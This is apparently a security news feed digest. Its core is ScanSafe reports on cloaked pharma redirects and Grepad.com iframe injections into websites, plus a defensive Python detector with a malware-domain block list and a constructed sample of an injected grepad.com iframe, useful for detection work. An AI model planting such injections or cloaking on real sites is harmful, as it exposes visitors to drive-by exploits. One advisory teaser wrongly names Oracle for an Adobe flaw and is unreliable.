In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders, and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally. The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits. Filtering is also being done by IP address range, operating system, and user-agent to determine when the embedded iframe (or pharma redirect) will occur.

The Million Dollar Question: How?
The why is easy to answer: attackers want to make money. The how is a bit more cloudy. It appears the attacker is able to read wp-config.php, which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp-option table for the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess, uploading malicious scripts which then embed the iframe. At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed-over to other sites on the same hosted share can still occur. It's worth noting that the U.S. Bureau of Engraving and Printing (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the Grepad.com attacks. While neither of these sites appears to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.

==> Grepad.com Iframe Nets Gov't, Niche Sites

http://blog.scansafe.com/journal/rss.xml ScanSafe traffic analysis reveals a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com, which attempts to exploit a series of vulnerabilities. Observed exploits include:
* Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992)
* Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927)
* Office OCX OpenWebFile (BID-33243)
* Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388)
* Hummingbird PerformUpdateAsync (CVE-2008-4728)
* Peachtree ExecutePreferredApplication (CVE-2008-4699)
* C6 Messenger propDownloadUrl (CVE-2008-2551)
* Internet Explorer memory corruption (MS09-002)

The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks has also been targeted against WordPress-published sites hosted by GoDaddy.
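The two ScanSafe posts above (the WordPress pharma / Grepad.com write-up and this Grepad.com iframe post) describe injection patterns a site owner can check for: markup appended after the closing html tag, iframes whose src points at one of the named malware domains, and cloaking, where a search spider and a browser receive different pages. The following is an added defensive example, not ScanSafe's tooling or code from the original posts. The domain list is taken from the posts; the HTML pages and the function names (audit_page, cloaking_delta) are constructed for the example.

```python
"""Defensive checks for the injection patterns ScanSafe describes:
content after </html>, iframes/scripts loading from the named malware
domains, and spider-vs-browser cloaking (different title or injected
references depending on who fetched the page)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Malware domains named in the two posts above (ScanSafe's observations).
KNOWN_BAD_HOSTS = {
    "grepad.com", "ginopost.com", "bigcorpads.com", "binglbalts.com",
    "corpadsinc.com", "hugeadsorg.com", "mainnetsoll.com", "networkads.net",
}


class _SrcCollector(HTMLParser):
    """Collect (tag, src) for every <iframe> and <script> that has a src."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append((tag, src))


def _collect(html):
    parser = _SrcCollector()
    parser.feed(html)
    return parser.refs


def trailing_markup(html):
    """Return whatever follows the closing </html> tag (whitespace stripped).
    A well-formed page returns ''; the Grepad injection lives here."""
    match = re.search(r"</html\s*>", html, re.IGNORECASE)
    return html[match.end():].strip() if match else ""


def audit_page(html):
    """Return a list of findings, each {'tag', 'src', 'reasons'}, for
    references that load from a known-bad host or sit after </html>."""
    tail_srcs = {src for _, src in _collect(trailing_markup(html))}
    findings = []
    for tag, src in _collect(html):
        reasons = []
        host = (urlparse(src).hostname or "").lower()
        if host in KNOWN_BAD_HOSTS:
            reasons.append("known malware host")
        if src in tail_srcs:
            reasons.append("placed after </html>")
        if reasons:
            findings.append({"tag": tag, "src": src, "reasons": reasons})
    return findings


def _title(html):
    match = re.search(r"<title>(.*?)</title>", html, re.IGNORECASE | re.DOTALL)
    return match.group(1).strip() if match else ""


def cloaking_delta(html_for_spider, html_for_browser):
    """Compare two fetches of the same URL, one made with a search-spider
    User-Agent and one with a browser's. Returns a dict of differences that
    match the cloaking described in the posts (pharma title shown only to
    spiders, iframe shown only to browsers); empty dict means no difference."""
    delta = {}
    spider_title, browser_title = _title(html_for_spider), _title(html_for_browser)
    if spider_title != browser_title:
        delta["title"] = (spider_title, browser_title)
    spider_refs = {(f["tag"], f["src"]) for f in audit_page(html_for_spider)}
    browser_refs = {(f["tag"], f["src"]) for f in audit_page(html_for_browser)}
    if spider_refs != browser_refs:
        delta["injected_refs"] = (sorted(spider_refs), sorted(browser_refs))
    return delta


# Constructed sample pages (not captured from any real site).
CLEAN = "<html><head><title>Town Gazette</title></head><body>news</body></html>\n"
# Grepad-style: cookie-dropping script plus a 1x1 iframe appended after </html>,
# served only to browsers.
INJECTED_BROWSER = CLEAN + (
    '<script>document.cookie="seen=1"</script>'
    '<iframe src="http://grepad.com/in.cgi" width="1" height="1"></iframe>'
)
# Pharma-style: the spider sees a rewritten title, the browser sees the real one.
PHARMA_SPIDER = CLEAN.replace("Town Gazette", "Town Gazette - Buy Cheap Pills Online")

if __name__ == "__main__":
    print(audit_page(INJECTED_BROWSER))
    print(cloaking_delta(CLEAN, INJECTED_BROWSER))
    print(cloaking_delta(PHARMA_SPIDER, CLEAN))
```

In practice the two arguments to cloaking_delta come from two HTTP fetches of the same URL with different User-Agent headers, each from a fresh, cookie-less session (the injected script sets a cookie to suppress the iframe on repeat visits, so a reused session would hide it), and ideally from an IP range the attackers' filters do not exclude. The domain list is only a snapshot from the posts; the after-</html> check catches the pattern regardless of which domain is in use.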

==> The Users are smarter than we give them credit for

http://blogs.securiteam.com/index.php/feed/ So, my boss had asked me last week to read the Mandiant report and see how these Chinese APT1 attacks could be detected on a network both during and after an attack. After reading the report, I was pretty saddened by just how little has been done in the last 20 years in Infosec. The [...]

==> Western society is WEIRD [1]

http://blogs.securiteam.com/index.php/feed/ (We have the OT indicator to say that something is off topic. This isn’t, because ethics and sociology is part of our profession, but it is a fairly narrow area of interest for most. We don’t have a subject-line indicator for that.) This article, and the associated paper, are extremely interesting in many respects. The [...]

==> Read this book. If you have anything to do with security, read this book.

http://blogs.securiteam.com/index.php/feed/ I have been reviewing security books for over twenty years now. When I think of how few are really worthwhile that gets depressing. However, Ross Anderson is always worth reading. And when Ross Anderson first published “Security Engineering” I was delighted to be able to tell everyone that it was a worthwhile read. If you [...]

==> REVIEW: Identity Theft Manual: Practical Tips, Legal Hints, and Other Secrets Revealed, Jack Nuern

http://blogs.securiteam.com/index.php/feed/ BKIDTHMA.RVW 20120831 “Identity Theft Manual: Practical Tips, Legal Hints, and Other Secrets Revealed”, Jack Nuern, 2012 %A Jack Nuern http://www.idtheftadvocates.com %C 4901 W. 136 St., Leawood, KS, USA 66224 %D 2012 %G ASIN: B0088IG92E %I Roadmap Productions %O fax 866-594-2771 %O http://www.amazon.com/exec/obidos/ASIN/B0088IG92E/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/B0088IG92E/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/B0088IG92E/robsladesin03-20 %O Audience n- Tech 1 Writing 1 (see revfaq.htm for [...]

==> Memory lane …

http://blogs.securiteam.com/index.php/feed/ I ordered a new computer before Christmas, and there have been delays getting it. Today the shop called and said that the one I ordered (with 4 Gigs of RAM) was still short, but they did have one with 6 Gigs, if I was willing to pay an extra ten bucks. So I said fine. [...]

==> Online forum rule haikus

http://blogs.securiteam.com/index.php/feed/ On the CISSPforum we were discussing precepts for getting along and keeping the discussions meaningful. Somebody started listing rules, so I started casting them as haikus. That prompted a few more. I wondered if these were only for that group, but then realized most of them were applicable to online discussions of whatever type. So, [...]

==> Official (ISC)2 Guide to the CISSP CBK

http://blogs.securiteam.com/index.php/feed/ Recently, on the CISSPforum, there was some discussion of the new, third edition of the Official (ISC)2 Guide to the CISSP CBK (which, I note, is pretending to be available as an ebook for only ten bucks). At the end of one post, one of the correspondents stated that he was “leaning towards buying the [...]

==> The death of AV. Yet again.

http://blogs.securiteam.com/index.php/feed/ And in other news, Gunter Ollman joins in the debate as to whether Imperva’s quasi-testing is worth citing (just about) and, with more enthusiasm, whether AV is worth paying for or even still breathing. If you haven’t come across Ollman’s writings on the topic before, it won’t surprise you that the answer is no. If [...]

==> Comparison Review: AVAST! antiviral

http://blogs.securiteam.com/index.php/feed/ PCAVAST7.RVW 20120727 Comparison Review Company and product: Company: ALWIL Software Address: Trianon Office Bldg, Budejovicka 1518/13a, 140 00, Prague 4 Phone: 00 420 274 005 777 Fax: 00 420 274 005 888 Sales: +42-2-782-25-47 Contact: Kristyna Maznkov/Pavel Baudis/Michal Kovacic Email: mazankova@avast.com baudis@asw.cz Other: http://www.avast.com Product: AVAST! antiviral Summary: Multilayered Windows package Cost: unknown Rating (1-4, [...]

==> Beware! The “Metavirus”!

http://blogs.securiteam.com/index.php/feed/ In the spirit of many infosec and antivirus company “announcements” of “new threats” in the past year: A leading (if unemployed) information security and malware researcher, today noted startling developments (which were first mentioned in 1988, but we’ll leave out that bit) in cross-platform malware. Dubbed the “metavirus,” this threat could completely swamp the Internet, [...]

==> 10 Skills Needed to be a Successful Pentester

http://blogs.securiteam.com/index.php/feed/ Mastery of an operating system. I can't stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems they're supposed to be hacking or securing. It's common knowledge that once you're on a target/victim, you need to somewhat put on the hat of a sysadmin. [...]

==> Bell bull

http://blogs.securiteam.com/index.php/feed/ I recently re-upped with Bell Canada for cell phone service. I bought new phones and upgraded the plan to include “unlimited” text messaging (since that’s how the grandkids mostly communicate). The plan I got is supposed to include picture and video messaging. In order to use the picture messaging I am told, by both the [...]

==> Airline security

http://blogs.securiteam.com/index.php/feed/ Mom and my little sister were supposed to go on a cruise over Christmas. The first leg of their flight to the embarkation port was cancelled when a door wouldn’t close. The storm in the midwest, and the consequent meltdown of the North American air travel system, put paid to any chance of getting re-routed. [...]

==> Risks of Risk Assessment in Multiple Small Illumination Sources During Winter Conditions

http://blogs.securiteam.com/index.php/feed/ Risks of Risk Assessment in Multiple Small Illumination Sources During Winter Conditions Robert M. Slade, version 1.0, 20121220 Testing can be used to demonstrate the presence of bugs, but never their absence. - testing aphorism ABSTRACT As follow-up research to the study “Risk Assessment and Failure Analysis in Multiple Small Illumination Sources During Winter Conditions” [...]

==> “Feudal” and the young employee

http://blogs.securiteam.com/index.php/feed/ In respect of Schneier’s article on “feudalism” in security (pledging “fealty” to a company/platform, and relying on the manufacturer/vendor to keep you safe), I’m sitting in a seminar for an ERP product from one of the “giants.” The speaker has stressed that you need an “easy to use” system, since your young employees won’t attend [...]

==> M-ETH: Man in the middle – Ethernet

http://blog.wintercore.com/?feed=rss2 Over a year ago I presented at LaCon'09 a custom PCI NIC which allows one to perform a man-in-the-middle on all the network traffic flowing through the device. The idea behind this PCI card is that once it is plugged into a computer, all the traffic can be inspected, analyzed and, of course, modified when required in [...]

==> Vulnerability Engineering

http://blog.wintercore.com/?feed=rss2 In this article we are going to use some metrics from Software Engineering and apply them to the Vulnerability Research World. We are going to define a new term which will allow us to get a probability showing how likely an application is to have a vulnerability during its lifetime, and which will also give an idea [...]

==> See Artica Demo Client and IceSphere in action

http://blog.wintercore.com/?feed=rss2 Download Video (24 MB). Do not hesitate to contact us if you need further information.

==> Motorola Timbuktu’s Internet Locator Service real-time data exposed to public

http://blog.wintercore.com/?feed=rss2 We just want to issue a public warning to those users of Motorola/Netopia Timbuktu Remote Control Software who are using the Internet Locator service. This service allows anyone to locate any Timbuktu user just by knowing their email address. More than five months ago we notified Netopia's customer support (http://blog.wintercore.com/2008/04/26/things-that-shouldnt-be-there/), after discovering a hardcoded user/password pair within [...]

==> Toward a new generation of audio captchas

http://blog.wintercore.com/?feed=rss2 It seems the post "Breaking Gmail's audio Captcha" has been slashdotted, and many interesting discussions have emerged as a result. It's worth noting that there is nothing especially exciting in the approach used to break the Google audio captcha, merely a bunch of signal analysis and pattern recognition principles applied. Almost any Voice Recognition / [...]

==> Things that shouldn’t be there

http://blog.wintercore.com/?feed=rss2 Some days ago we released a security advisory for Realtek (curious note: according to Secunia, it is the first advisory for that vendor) where a piece of code that was originally intended to be used by the engineers only ends up being compiled into the release driver. Obviously, there is no reason to think about this [...]

==> Breaking Gmail’s Audio Captcha

http://blog.wintercore.com/?feed=rss2 A week ago I came across this interesting post at the Websense blog; anyway, I guess everybody is already aware that a bot was spotted breaking Gmail's image captcha. According to the post, the success rate is about 20%, which from the spammers' point of view is really profitable and surely more than enough for its [...]

==> UK Is Sixth In The World As Cyber Crime Target, Cyber Security Is Not Marketed Enough

http://cyberinsecure.com/feed/ It has been suggested by UK ministers recently that there should be better awareness of the importance of cyber security. Although conventionally it is the more traditional generations that are wary of sharing their details in the new digital world, it is perhaps not such a bad thing to be more cautious. Jim Murphy, the Shadow [...]

==> Hijacked High-Ranked Sites Serve Malicious, Illegal Content, Blacklisted By Google

http://cyberinsecure.com/feed/ Researchers have found that Google Safe Browsing has blacklisted a number of legitimate sites after they’ve been hijacked and set up to serve malicious or illegal content. Many of them are ranked high, according to Alexa. Zscaler experts have scanned the first 1 million websites found in the Alexa top and found that 621 of [...]

==> Apple Plugs Java Hole After Flashback Trojan Creates 550,000 Strong Mac Botnet

http://cyberinsecure.com/feed/ Apple released a security update for OS X Java on Tuesday, plugging a security vulnerability exploited by the latest Flashback Trojan. The latest variant of the Mac-specific malware appeared on Monday and targeted a vulnerability in Java (CVE-2012-0507) which was patched on Windows machines more than six weeks ago. Apple’s new version of Java for [...]

==> Free Malware Scanning Service SiteInspector Launched By Comodo

http://cyberinsecure.com/feed/ Security solutions provider Comodo released a free service called SiteInspector, designed to scan websites for pieces of malware and compare them against a range of blacklisting services, such as the ones offered by Google Safe Browsing, PhishTank or Malwaredomainlist. Drive-by-download malware attacks launched from websites that fall victim to mass infections are highly common these [...]

==> US Army CECOM Website Breached, 30 Record Sets With User IDs, Clear-text Passwords, Private Data Posted On Pastebin

http://cyberinsecure.com/feed/ Black Jester, the hacker who yesterday demonstrated that he managed to gain unauthorized access to a NASA site, leaked sensitive contract information from a site connected to the US Army Communications and Electronics Command (CECOM). Thirty record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords [...]

==> Scareware Makes Files And Folders Invisible, Demands Ransom For Repair Utility

http://cyberinsecure.com/feed/ Bitdefender experts came across a piece of scareware that makes victims believe that something may have happened to all the files and folders stored on their computers. The user is then requested to pay $80 (60 EUR) for a tool that allegedly addresses the problem. Scareware or ransomware is not uncommon, many security solutions providers [...]

==> US Security Firm Stratfor Hit By ‘Anonymous’, Clients Credit Cards And Passwords Stolen

http://cyberinsecure.com/feed/ The hacking group “Anonymous” on Sunday, Christmas Day, claimed it had stolen thousands of credit card numbers and personal information of clients of the U.S. based security think-tank Stratfor and pilfered funds it gave away as Christmas donations to charity. Anonymous said it stole information from organizations and individuals that were clients of Stratfor, including Apple [...]

==> Ultimate Bet Players Accounts Compromised, 3.5 Million Records Freely Available Online For Weeks Still In Google Cache

http://cyberinsecure.com/feed/ In a breach of security at Ultimate Bet, information from every player's account had been publicly posted on the internet, revealing personal information of approximately 3.5 million poker players holding accounts at the nearly-dead poker site. A popular poker forum website posted a link to the account information via an anonymous posting, but removed the [...]

==> Restaurant Depot, Jetro Cash & Carry Processing System Compromised, Credit Cards Sold On Russian Blackmarket

http://cyberinsecure.com/feed/ If you used a credit card between the dates of Sept. 21 and Nov. 18th at national restaurant wholesalers Restaurant Depot or Jetro Cash & Carry, then you should probably know that Russian cyberthugs wearing leather blazers and gold chains and stinking of Armani Aqua di Gio are currently selling your information on the black [...]

==> InternationalCheckout.com Database Hacked, Customers Credit Cards Abused

http://cyberinsecure.com/feed/ International Checkout customers began receiving emails alerting them to the fact that the organization has recently fallen victim to a cyberattack which resulted in the theft of a large quantity of personal information, including credit card details. International Checkout was recently the victim of a system intruder who was able to access encrypted credit [...]

==> Software Offered By CNET Bundled With Trojans, Spread Through Download.com

http://cyberinsecure.com/feed/ One of the developers of a network exploration and security auditing tool called Nmap is accusing CNET of bundling free software with Trojans and shady toolbars, and serving them on their Download.com website. Gordon Lyon, also known as Fyodor, claims he discovered that Nmap and other free applications such as VLC are downloaded with pieces [...]

==> Unpatched Yahoo! Messenger Flaw Allows Status Updates Remote Hijacking

http://cyberinsecure.com/feed/ Security researchers have discovered an unpatched flaw in Yahoo! Messenger that allows miscreants to change any user’s status message. Hijacked status updates are a handy way to persuade a victim’s contacts to click on a link and lead them to a dangerous website. Worse still, the bug in version 11.x of the Messenger client requires [...]

==> Adidas Websites Taken Down After Attack, Adidas.com, Reebok.com Affected

http://cyberinsecure.com/feed/ The popular sports equipment maker took down some of its websites after a security breach targeting its network was discovered on November 3. The affected locations include adidas.com, reebok.com, miCoach.com, adidas-group.com and some local e-commerce shops. They were all taken down in order to protect the individuals that might visit them. Our preliminary investigation [...]

==> Private Canadian Children’s Ministry Papers Dumped In Trash, Contain Names, Addresses, Birth Dates

http://cyberinsecure.com/feed/ The B.C. government is dealing with another privacy breach after confidential documents from the Ministry of Children and Family Development were found dumped in a garbage bin. The documents were discovered dumped in a green dumpster behind a Victoria apartment building last week, and contain client names, addresses, birth dates and health card numbers. At [...]

==> Numerous Defense And Chemical Firms Targeted In Industrial Espionage Campaign

http://cyberinsecure.com/feed/ Dozens of companies in the defense and chemical industries have been targeted in an industrial espionage campaign that steals confidential data from computers infected with malware, researchers from Symantec said. At least 29 companies involved in the research, development, and manufacture of chemicals and an additional 19 firms in defense and other industries have been [...]

==> Phishing Campaign Fakes Legitimate Apple Emails, Steals Victims’ ID And Password

http://cyberinsecure.com/feed/ A phishing campaign which exploits the reputation of Apple has been seen invading inboxes. The rogue message perfectly replicates the alerts customers receive when the company notifies them of changes to their accounts. A Trend Micro researcher came across a message that looked very much like the genuine message he had received not long ago [...]

==> osCommerce Compromised Sites Distribute ZeuS Spin-off Trojan, Millions Of Pages Infected

http://cyberinsecure.com/feed/ Security researchers warn that variants of a ZeuS spin-off trojan called Ice-IX are being distributed from osCommerce websites compromised during a recent mass injection attack. The attack targeting osCommerce installations vulnerable to a flaw that dates from November 2010 began at the end of July. The code injection campaign escalated quickly and the number of [...]

==> Data From 56 Law Enforcement Agencies Stolen By Antisec, 10GBs Of Emails From 300 Accounts Posted Online

http://cyberinsecure.com/feed/ Hackers associated with Anonymous’ Operation Antisec have leaked a massive cache of personal records, email messages and confidential documents belonging to law enforcement agencies. The data was obtained recently when the group hacked into a server housing 77 websites belonging to county sheriff offices and other local law enforcement organizations. The leak has been posted [...]

==> US Government Contractor ManTech Hacked, Confidential Documents Stolen And Posted Online

http://cyberinsecure.com/feed/ Anonymous has published around 400 MB of confidential documents involving ManTech, a large federal contractor which provides IT solutions to many government departments. The hacktivist collective announced plans to release the files yesterday and even posted some teaser samples to prove it means business. The full archive was eventually released in true Anonymous style, with [...]

==> U.S. Military Contractor Booz Allen Hamilton Hacked, Emails And Sensitive Data Exposed

http://cyberinsecure.com/feed/ Hackers affiliated with the Anonymous collective and its Antisec campaign have hacked into computer systems belonging to U.S. military contractor Booz Allen Hamilton and leaked sensitive data found inside. The hackers described the attack in the description of a torrent posted on ThePirateBay which also contains a list of 90,000 email addresses belonging to military [...]

==> Definitively Moved to Blogspot

http://evilcodecave.wordpress.com/feed/ Definitively Moved to Blogspot www.evilcodecave.blogspot.com

==> Fast Overview of SpyEye

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/02/fast-overview-of-spyeye.html

==> Rootkit Agent.adah Anatomy and Executables Carving via Cryptoanalytical Approach

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2010/01/rootkit-agentadah-anatomy-and.html

==> PHP/Spy.Bull Cryptanalysis of Encryption used and Threat Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/phpspybull-cryptanalysis-of-encryption.html

==> Siberia ExploitPack and PDF Exploit Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/12/siberia-exploitpack-and-pdf-exploit.html

==> DNAScan Malicious Network Activity Reverse Engineering

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/dnascan-malicious-network-activity.html

==> Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/avast-aswrdrsys-kernel-pool-corruption.html

==> PHPSpyScanBot Analysis

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/phpspyscanbot-analysis.html

==> [Crimeware] Researches Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/ http://evilcodecave.blogspot.com/2009/11/crimeware-researches-about-eleonore.html

==> [Crimeware] Researches and Reversing about Eleonore Exploit Pack

http://evilcodecave.wordpress.com/feed/

==> Oracle releases new Java patch to address this week’s McRat problem

http://feeds.arstechnica.com/arstechnica/security?format=xml It's an old but necessary hat: Oracle says install its new security patch ASAP.

==> Critics: Substandard crypto needlessly puts Evernote accounts at risk

http://feeds.arstechnica.com/arstechnica/security?format=xml Security experts find flaws in password storage, Android app, following breach.

==> Evernote resets user passwords after being hit by “coordinated” hack

http://feeds.arstechnica.com/arstechnica/security?format=xml Breach exposes cryptographically hashed and salted passwords.

==> Apple blacklists older versions of Flash plugin due to security risk

http://feeds.arstechnica.com/arstechnica/security?format=xml Flash is the new Java. Or is that the other way around?

==> Another Java zero-day exploit in the wild actively attacking targets

http://feeds.arstechnica.com/arstechnica/security?format=xml Latest attacks used to surreptitiously install McRat trojan on victim machines.

==> “Download this gun”: 3D-printed semi-automatic fires over 600 rounds

http://feeds.arstechnica.com/arstechnica/security?format=xml And the Department of Justice says there's nothing illegal about it, either.

==> Exploit lets websites bombard visitors’ PCs with gigabytes of data

http://feeds.arstechnica.com/arstechnica/security?format=xml Chrome, IE, and Safari trick could become new form of Rick Roll.

==> Oakland mayor apologizes for promoting local lockpicking class

http://feeds.arstechnica.com/arstechnica/security?format=xml Mayor Jean Quan seems unaware that the practice is well-established among hackers.

==> Bizarre old-school spyware attacks governments, sports Mark of the Beast

http://feeds.arstechnica.com/arstechnica/security?format=xml MiniDuke pierces Adobe sandbox, uses Twitter to get instructions.

==> Adobe releases third security update this month for Flash Player

http://feeds.arstechnica.com/arstechnica/security?format=xml Latest advisory assigns top priority rating to Windows and Mac users.

==> Revealed: Stuxnet “beta’s” devious alternate attack on Iran nuke program

http://feeds.arstechnica.com/arstechnica/security?format=xml Version 0.5 shows cyberweapon development began two years earlier than thought.

==> Researchers find yet another way to get around iOS 6.1 passcode

http://feeds.arstechnica.com/arstechnica/security?format=xml It turns out there are two versions of this vulnerability in iOS 6.1.

==> Java’s latest security problems: New flaw identified, old one attacked

http://feeds.arstechnica.com/arstechnica/security?format=xml Flaw in latest Java version allows bypass of Java security sandbox.

==> Server hack prompts call for cPanel customers to take “immediate action”

http://feeds.arstechnica.com/arstechnica/security?format=xml Change root and account passwords and rotate SSH keys, company advises.

==> HTC “failed to employ reasonable security” on Android, says FTC

http://feeds.arstechnica.com/arstechnica/security?format=xml The millions of HTC tablets and phones affected must be patched within 30 days.

==> Donald Trump’s Twitter “seriously hacked,” tweets Lil Wayne lyrics

http://feeds.arstechnica.com/arstechnica/security?format=xml Couldn't happen to a nicer guy.

==> Dev site behind Apple, Facebook hacks didn’t know it was booby-trapped

http://feeds.arstechnica.com/arstechnica/security?format=xml iPhoneDevSDK says it wasn't contacted by the companies or law enforcement.

==> “il0vetheWhopper” doesn’t cut it: Twitter calls for tougher passwords

http://feeds.arstechnica.com/arstechnica/security?format=xml Burger King Twitter takeover prompts reminder.

==> How Anonymous accidentally helped expose two Chinese hackers

http://feeds.arstechnica.com/arstechnica/security?format=xml The HBGary hack offered security researchers a treasure trove of information.

==> Facebook, Twitter, Apple hack sprung from iPhone developer forum

http://feeds.arstechnica.com/arstechnica/security?format=xml The site, iphonedevsdk.com, could still be hosting exploit attacks.

==> Unusually detailed report links Chinese military to hacks against US

http://feeds.arstechnica.com/arstechnica/security?format=xml Chinese intrusions are increasingly targeting critical industrial systems.

==> Apple HQ also targeted by hackers, will release tool to protect customers

http://feeds.arstechnica.com/arstechnica/security?format=xml "There is no evidence that any data left Apple," the company says.

==> Facebook computers compromised by zero-day Java exploit

http://feeds.arstechnica.com/arstechnica/security?format=xml Facebook Chief Security Officer offers details in exclusive interview.

==> iOS 6.1 brings back bug that gives anyone access to your contacts, photos (Update)

http://feeds.arstechnica.com/arstechnica/security?format=xml The steps are complex, but a persistent hacker could access personal data.

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there’s information available to help. The Best Web Hosts is a great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practice's server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditab's Intelligent Medical Software (IMS) combines features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

http://feeds.feedburner.com/Docucrunch?format=xml Noteworthy's NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an office's current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKesson's Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of an Oracle product.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

